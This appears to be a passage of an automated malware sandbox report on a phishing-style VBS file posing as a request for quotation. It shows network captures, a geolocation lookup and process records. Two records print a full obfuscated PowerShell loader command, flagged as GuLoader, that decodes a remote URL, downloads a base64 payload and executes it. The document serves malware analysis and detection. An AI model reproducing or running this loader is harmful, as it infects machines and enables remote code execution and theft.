                                                                                Data Ascii: ;|?Hb];(=yAZSa&Rp?Bu=1DI>(&9s;/s9/"J'To2d{3!rVZ/;|PQ<y+~CT2r'lZ!:(b:5E]os cg?#vB^i2QC|v{v(xwWl$Em";<#
                                                                                Apr 18, 2024 15:40:57.565516949 CEST1289INData Raw: 9d 35 91 02 c2 d0 d0 7b af 09 ce 78 44 06 e1 4e 61 7b 71 11 d3 47 51 11 89 1b de dc c1 dd 1d 2c 53 7c 2c 75 80 88 63 61 36 f6 ce 3f e7 c7 46 d0 27 38 60 12 d7 09 1b 01 78 b6 e1 43 2f 86 4f c4 9c 3c 2a dd 74 90 b1 9e ff 81 da d0 6c 8c 87 47 76 d1
                                                                                Data Ascii: 5{xDNa{qGQ,S|,uca6?F'8`xC/O<*tlGv1&_akTs_zd%;_%}b'G3w20ZX/Ko:&Doo{L+ol\W)sfdcntupD|.<1SR
                                                                                Apr 18, 2024 15:40:57.565557003 CEST1289INData Raw: 25 15 76 4b f8 d3 6a fe f3 4a b3 1f 5a 93 02 ea 53 cb ab 1b 37 3c 63 ee 3c 4f a6 da 34 78 00 db 1b 97 32 4f 6a de c1 49 08 9f 7e 19 d1 d4 88 41 f6 0d 5b 62 ae d5 f4 88 c5 b6 14 d5 8a e9 18 a3 e9 1d a2 c9 48 28 fd dd cb bc c1 e9 c3 6b 32 50 c2 58
                                                                                Data Ascii: %vKjJZS7<c<O4x2OjI~A[bH(k2PX93d.S.*KMUpPI5Cv/Nr%Hwp|1{sc}PKG8=9g6$V|)Dse/^s4H_].\cQ%>M
                                                                                Apr 18, 2024 15:40:57.565593958 CEST1289INData Raw: 71 16 e7 fe e8 bf bd 0c cb a0 b8 cf 7f cf 41 63 50 96 91 2c e2 c7 c9 e7 a3 9e c0 62 cd 6a 1d 2e 7f b0 89 d6 c3 0f bc 51 7c 2e 78 48 80 08 34 0b 0e b3 4c 29 df 56 dc 30 43 3e 58 0c c4 0d 50 51 82 11 81 e6 3c 9e fc b5 26 1c 67 ce 0f e7 94 e3 53 2f
                                                                                Data Ascii: qAcP,bj.Q|.xH4L)V0C>XPQ<&gS/MJ=JRfbYg:T(p LsbQ^XUs]:+eyB%jCsJTW?lr+K+Ze?s/1>Ws6R}9\_mQLv$H7?Z/
                                                                                Apr 18, 2024 15:40:57.565634012 CEST1289INData Raw: e9 8e 01 0b f3 28 47 fe 0c dd ab b9 5e 40 ae ce b1 07 c2 97 13 7c 16 5d c7 63 01 5f c3 8d 49 c5 20 42 5b 9c 86 fc db 43 6c ce 1f 55 04 65 c3 6d 47 ea 2b 24 4a e7 df c4 ab d5 26 f2 07 76 d1 6f 30 86 56 2f 61 54 3d 7c 08 fd 99 d6 67 c0 3c a3 0e 97
                                                                                Data Ascii: (G^@|]c_I B[ClUemG+$J&vo0V/aT=|g<p-#_C'lQaGJqc72go/Qa*B5^;Lp(hFN>=8ntUU! vVKY|!_@v_dh~mPl}\k%j#2va6pe@EAE
                                                                                Apr 18, 2024 15:40:57.762691021 CEST1289INData Raw: 0f ca e3 63 a0 22 e6 4b e9 5b ab 01 cc 1f 8d c2 58 72 ca c9 1e 8b 8e af e4 b6 70 74 28 68 aa db 33 84 3e 2f 31 43 fa 0a 3a 50 6d aa fa 3d 3f a2 13 ec df b1 6d a2 fd d1 cb 26 1e c2 3c ba aa 90 98 cd 13 8f bb 8a 5f c0 1e e6 78 24 79 2d e0 64 22 f2
                                                                                Data Ascii: c"K[Xrpt(h3>/1C:Pm=?m&<_x$y-d"y2]n2YIT(}AdI{6,k-b;\Po<upe|q b>Vpm5|)!`cOM.'/;+}JL>ycI+ywp24b


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.749713178.237.33.50801848C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Apr 18, 2024 15:41:02.179312944 CEST71OUTGET /json.gp HTTP/1.1
                                                                                Host: geoplugin.net
                                                                                Cache-Control: no-cache
                                                                                Apr 18, 2024 15:41:02.392190933 CEST1171INHTTP/1.1 200 OK
                                                                                date: Thu, 18 Apr 2024 13:41:02 GMT
                                                                                server: Apache
                                                                                content-length: 963
                                                                                content-type: application/json; charset=utf-8
                                                                                cache-control: public, max-age=300
                                                                                access-control-allow-origin: *
                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 61 72 69 65 74 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 47 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 34 2e 30 34 31 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 34 2e 35 30 35 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 31 30 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                Data Ascii: { "geoplugin_request":"81.181.57.52", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Marietta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0414", "geoplugin_longitude":"-84.5053", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:15:39:53
                                                                                Start date:18/04/2024
                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs"
                                                                                Imagebase:0x7ff6587f0000
                                                                                File size:170'496 bytes
                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:15:40:04
                                                                                Start date:18/04/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDividetU,dsig.,dningWM kroseSfogatbInfiksCpi.kanlRena liInterpeBemurmnIndvaltCrypto ');Skruegangen (Noncolloid 'Tonika$fabulaI Sankts H.ndeoBoligptUdvalgoUnperipArch,ue Cit,osRemrke. ForelHBoretle.oktorabesaaed ,hougeGrmmelrUnnicksStud e[F,itur$L mnopFInfrate Inchaw Ru,dbtSinoloeyhwhcarU kadeeMaskinr Kop l]Anastr=Oinome$SchmeeTBountio onmart,etereaUnderdlUsersks Ro tgaByl,vbnafvaskeValgber TragtiAflusnnUrgedig Red,eeU.dersnBarrels embus ');$Hunched125=Noncolloid 'BullenIHvdstis Martho Nonu tHarm no garosp aempeened assVi dtb. teglvDInurnmoFrilagwProgran ,oponlRetranoudraabaMatrosdSysk iFArtikeiDecelelVagotoeConcoc( brico$QuinquO unautnPit,hpo.eterrmLedemoaOmniact PhysioPres glAalebloInordigPartheiDysoxicRoadcraReva,ulPla sm,Thr.ve$ NoncoH Filmpranfrsed AgesteAnayaclA pelssM usqueMochef)ecdyse ';$Hunched125=$Scouress[1]+$Hunched125;$Hrdelse=$Scouress[0];Skruegangen (Noncolloid 'Niver,$Ched,agSku,apl,asetvoPlanetb M.senaFalketlGauntl:SabianOPleasusRudernsSpndkriSm.ochf g.citlEnerveuty,agteinventnTweedet Hedes=Adfrds( HormoTUsurpme AerobsDeignit Vidun-FumlegPShortcaFaa.ektsampelh Lucar P,dera$comf.sHBrednirvapo.idst,dfseSkib.tl Denatsto,nefe Thre.)Aktivi ');while (!$Ossifluent) {Skruegangen (Noncolloid ' Fe.er$Sk,lnng Al.ehlUptakeo Ho,sebBarkeraC aspalZymoly:S,gnifAIncatenVagnartMaterniJenopetThy.ore.dstanrIndaanrSkraamoAntitorNeust,kS iklio Wanglr NostapSpildpstvrend=Rev rs$Sm.atit DiplorTermoduStifteeBarbas ') ;Skruegangen $Hunched125;Skruegangen (Noncolloid ' Lyk wS .nkamt Episca OvervrLace,at Lys,g-HndervS Skolel,nquiceJanglieAnd.gtptungme Ku.kek4Nummer ');Skruegangen (Noncolloid ' Deifo$Transcg.rugerl Tan,eoScaniabKremloaSheb,alRaflin:VellalOVolderssalgsdsactinoi OpstifMinimul.egatiuPanicle recirnHarmontErhver= ,hame(Micro.TOmstyrePiercesPrimittBi boq-,elysnPTec niaAff litNovellh Stev Unwrat$SignalHuncontrF ldspdHirslee tjlaplWherrisSenioreResoci)Pa.tic ') ;Skruegangen (Noncolloid 'C,ndle$ Parleg RebuclPa madoMaltrabGipsdea St,lnlTrigem:Ge,nemDtawkeer Uvan,iglidenfv nligtPhantasAnlbegrP,ovoseZymosas Squawu DybstlSto pitModsp.aCir ultDecoloe BerigrUnd.rk=Eunuch$Genredg UddanlPirredoCoatimbAfs.nda Ord.nlMultit:BrickbNRevisioTsubodnOverofrtrimoreRntgencEfterlt O ergi DelstfTankf,iR,tschadesoxyb.mkamplMi,ireeFamili+ Abstr+Maskin%Kalcin$ Uig nTDefinio Grea pB.ulkcs hya,nlAnpa.t.Ac.entcTegnino Plastu Brassn jgerstInabed ') ;$Onomatological=$Topsl[$Driftsresultater];}Skruegangen (Noncolloid ' Crede$U.syreg BesvrlHeterooKosherbCaiquea Ron,llForfor:,usareEKrem trTiss mn elefor Cel ui Mo.tenDeviligGaug,asKnirket Finhvi HomoelDagglesRub,nstunbalkapreludn ChiandBipo,sePant gn SkattsFemina Cuem.= Midle ultivGpeanuteGeys.rtunshro-ErklriC SubseoIntercnAmmedetbraknsealfil nHyd.ogtCausre Karak$ElektrHForurer EntopdAffrone NonexlJ ntjespesticeEn iro ');Skruegangen (Noncolloid 'Chizza$ClinodgAlangilBassetoMaternbi,tuitaAmueixlLi ief:CollapPCol uro,andsarArbejdr,istrii ntididApprokgKartotyphotog Data,e=Philip ,umat[KettapSPbeleny damkus BilabtUnfouneJvningmhemsti. J rdbC Ba.reoSnoretn lydskvOveriseSkrmterHovedhtIschia] Tilbe:Chefko: Wen iFZonelorSukkeroSkorpem ,caloBperspeaNewlinsHrebrieIbrugv6Darc.j4 OrrhoSTr,nedtHarberr SubliiDoughnn ,randgBlindl( Press$conserE KlupprSuperinUdviklr Cenobi SupernFleshlglestrasVdderetAkti.li EncyslArterisBiennetUlricha hooglnFleshidPorcele spytsnStolidsAab.nb)Unmesh ');Skruegangen (Noncolloid 'Summem$F.emtrgUrticolGranatoPendl,b.ageevablgesllAvling: SpectIDogmendSomna,e Metinh HemociKonstrsTe,sentEftermoTidsler IrrepiSkrbuge ollisnJurelosT,wnle Yajnav=Sp.net Ha,pul[Te.efoS tabscyKinesesJumpietFlugtseLivsfoma.krft. UnderT ,orhae ogyix StregtMastin.AposteESame,snKlanercSkatteokardusdNongeniForsynn UdslygEndevr] Augus:M,conm:RematrAnewsmaS trabeCOpdeliITr ktoImbaend.FitcheGSurribeHemi it MotivS ougietTvre,trM dianiHrskarnUntem.gFilmsk(Precon$HamdmaPTy dsloQ.ixotrAfsvaerKlareni .rassdKassedg On,ley .rbej)Udenri ');Skruegangen (Noncolloid 'Besti.$riverbg.leasulEfterkoIrr.tabcacopraAnnexelCallgi: Forb.F olyoprSpewereOzo.idmGravemf EuctirOkk.lteNdudga=Do,ing$EupomaIMalaridBriggseUdst,ahIdrtskiAnglomsLiblabtChar coMusikarHeptagiNa coteAftegnnA mangsRelate.LiderlsRullenu Syn.lbFrimrks Triant Raadsr raveliCott.nnUnderagReform(Sylvan3Eviden2 Ree,l2 Indlg3astron5 Urteg9Benytt, Chann2 Secur9Plenis0.artis6Subtr.3 ilbag)Vansir ');Skruegangen $Fremfre;"
                                                                                Imagebase:0x7ff741d30000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2227118758.000001C46BE7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:12
                                                                                Start time:15:40:04
                                                                                Start date:18/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff75da10000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:13
                                                                                Start time:15:40:06
                                                                                Start date:18/04/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"
                                                                                Imagebase:0x7ff7eb210000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:15
                                                                                Start time:15:40:12
                                                                                Start date:18/04/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDividetU,dsig.,dningWM kroseSfogatbInfiksCpi.kanlRena liInterpeBemurmnIndvaltCrypto ');Skruegangen (Noncolloid 'Tonika$fabulaI Sankts H.ndeoBoligptUdvalgoUnperipArch,ue Cit,osRemrke. ForelHBoretle.oktorabesaaed ,hougeGrmmelrUnnicksStud e[F,itur$L mnopFInfrate Inchaw Ru,dbtSinoloeyhwhcarU kadeeMaskinr Kop l]Anastr=Oinome$SchmeeTBountio onmart,etereaUnderdlUsersks Ro tgaByl,vbnafvaskeValgber TragtiAflusnnUrgedig Red,eeU.dersnBarrels embus ');$Hunched125=Noncolloid 'BullenIHvdstis Martho Nonu tHarm no garosp aempeened assVi dtb. teglvDInurnmoFrilagwProgran ,oponlRetranoudraabaMatrosdSysk iFArtikeiDecelelVagotoeConcoc( brico$QuinquO unautnPit,hpo.eterrmLedemoaOmniact PhysioPres glAalebloInordigPartheiDysoxicRoadcraReva,ulPla sm,Thr.ve$ NoncoH Filmpranfrsed AgesteAnayaclA pelssM usqueMochef)ecdyse ';$Hunched125=$Scouress[1]+$Hunched125;$Hrdelse=$Scouress[0];Skruegangen (Noncolloid 'Niver,$Ched,agSku,apl,asetvoPlanetb M.senaFalketlGauntl:SabianOPleasusRudernsSpndkriSm.ochf g.citlEnerveuty,agteinventnTweedet Hedes=Adfrds( HormoTUsurpme AerobsDeignit Vidun-FumlegPShortcaFaa.ektsampelh Lucar P,dera$comf.sHBrednirvapo.idst,dfseSkib.tl Denatsto,nefe Thre.)Aktivi ');while (!$Ossifluent) {Skruegangen (Noncolloid ' Fe.er$Sk,lnng Al.ehlUptakeo Ho,sebBarkeraC aspalZymoly:S,gnifAIncatenVagnartMaterniJenopetThy.ore.dstanrIndaanrSkraamoAntitorNeust,kS iklio Wanglr NostapSpildpstvrend=Rev rs$Sm.atit DiplorTermoduStifteeBarbas ') ;Skruegangen $Hunched125;Skruegangen (Noncolloid ' Lyk wS .nkamt Episca OvervrLace,at Lys,g-HndervS Skolel,nquiceJanglieAnd.gtptungme Ku.kek4Nummer ');Skruegangen (Noncolloid ' Deifo$Transcg.rugerl Tan,eoScaniabKremloaSheb,alRaflin:VellalOVolderssalgsdsactinoi OpstifMinimul.egatiuPanicle recirnHarmontErhver= ,hame(Micro.TOmstyrePiercesPrimittBi boq-,elysnPTec niaAff litNovellh Stev Unwrat$SignalHuncontrF ldspdHirslee tjlaplWherrisSenioreResoci)Pa.tic ') ;Skruegangen (Noncolloid 'C,ndle$ Parleg RebuclPa madoMaltrabGipsdea St,lnlTrigem:Ge,nemDtawkeer Uvan,iglidenfv nligtPhantasAnlbegrP,ovoseZymosas Squawu DybstlSto pitModsp.aCir ultDecoloe BerigrUnd.rk=Eunuch$Genredg UddanlPirredoCoatimbAfs.nda Ord.nlMultit:BrickbNRevisioTsubodnOverofrtrimoreRntgencEfterlt O ergi DelstfTankf,iR,tschadesoxyb.mkamplMi,ireeFamili+ Abstr+Maskin%Kalcin$ Uig nTDefinio Grea pB.ulkcs hya,nlAnpa.t.Ac.entcTegnino Plastu Brassn jgerstInabed ') ;$Onomatological=$Topsl[$Driftsresultater];}Skruegangen (Noncolloid ' Crede$U.syreg BesvrlHeterooKosherbCaiquea Ron,llForfor:,usareEKrem trTiss mn elefor Cel ui Mo.tenDeviligGaug,asKnirket Finhvi HomoelDagglesRub,nstunbalkapreludn ChiandBipo,sePant gn SkattsFemina Cuem.= Midle ultivGpeanuteGeys.rtunshro-ErklriC SubseoIntercnAmmedetbraknsealfil nHyd.ogtCausre Karak$ElektrHForurer EntopdAffrone NonexlJ ntjespesticeEn iro ');Skruegangen (Noncolloid 'Chizza$ClinodgAlangilBassetoMaternbi,tuitaAmueixlLi ief:CollapPCol uro,andsarArbejdr,istrii ntididApprokgKartotyphotog Data,e=Philip ,umat[KettapSPbeleny damkus BilabtUnfouneJvningmhemsti. J rdbC Ba.reoSnoretn lydskvOveriseSkrmterHovedhtIschia] Tilbe:Chefko: Wen iFZonelorSukkeroSkorpem ,caloBperspeaNewlinsHrebrieIbrugv6Darc.j4 OrrhoSTr,nedtHarberr SubliiDoughnn ,randgBlindl( Press$conserE KlupprSuperinUdviklr Cenobi 